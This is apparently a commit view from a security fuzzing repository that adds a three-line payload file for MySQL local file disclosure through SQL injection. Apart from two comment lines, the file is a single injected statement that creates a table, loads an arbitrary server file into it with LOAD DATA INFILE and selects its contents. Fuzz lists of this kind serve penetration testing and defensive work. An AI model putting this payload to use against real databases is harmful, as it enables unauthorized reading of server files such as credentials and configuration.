Quick clean up of locations
This commit is contained in:
3
Fuzzing/Databases/MySQL-Read-Local-Files.fuzzdb.txt
Normal file
3
Fuzzing/Databases/MySQL-Read-Local-Files.fuzzdb.txt
Normal file
@@ -0,0 +1,3 @@
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user